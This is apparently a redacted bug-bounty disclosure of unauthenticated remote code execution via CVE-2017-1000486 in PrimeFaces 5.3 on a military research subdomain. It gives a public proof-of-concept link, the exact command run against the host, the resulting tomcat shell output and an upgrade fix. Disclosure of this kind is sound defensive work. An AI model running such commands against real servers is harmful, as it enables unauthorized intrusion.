RCE in ██████ subdomain via CVE-2017-1000486

**Summary:** The application at ████████/ftn-Website/ uses primefaces 5.3 but not 5.3.8, making it vulnerable to unauthenticated RCE CVE-2017-1000486. ## Step-by-step Reproduction Instructions 1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486 2. Execute: `python primefaces.py ███/ftn-Website/ -c id` 3. Success: `uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0` ## Product, Version, and Configuration (If applicable) primefaces 5.3 ## Suggested Mitigation/Remediation Actions Update primefaces. ## Impact An unauthenticated, 3rd-party attacker or adversary can execute remote code on restsvr1.ftn.research.usafa.edu as the unix `tomcat` user. Note that this service uses a DoD IP, suggesting an attacker could potentially pivot elsewhere afterwards.